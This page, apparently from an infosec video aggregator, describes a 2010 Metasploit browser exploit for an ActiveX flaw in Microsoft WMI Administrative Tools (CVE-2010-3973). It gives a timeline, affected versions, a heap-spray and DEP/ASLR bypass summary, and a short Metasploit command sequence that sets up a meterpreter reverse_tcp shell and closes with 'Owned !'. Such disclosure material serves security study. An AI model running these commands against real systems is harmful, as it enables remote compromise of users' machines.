Description: Timeline :
Vulnerability & PoC disclosed by WooYun the 2010-12-22
Metasploit PoC provided the 2010-12-22
PoC provided by:
WooYun
MC
jduck
Reference(s) :
CVE-2010-3973 (WooYun)
CVE-2010-4588 (Carsten Eiram)
Affected versions :
Microsoft WMI Administrative Tools 1.1
Tested on Windows XP SP3
Description :
This module exploits a memory trust issue in the Microsoft WMI Administration tools ActiveX control. When processing a specially crafted HTML page, the WEBSingleView.ocx ActiveX Control (1.50.1131.0) will treat the 'lCtxHandle' parameter to the 'AddContextRef' and 'ReleaseContext' methods as a trusted pointer. It makes an indirect call via this pointer which leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions. The WMI Adminsitrative Tools are a standalone download & install (linked in the references).
Metasploit demo :
use exploit/windows/browser/wmi_admintools
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
ipconfig
Owned !
Tags: vmi , windows , metasploit , 0day , microsoft ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.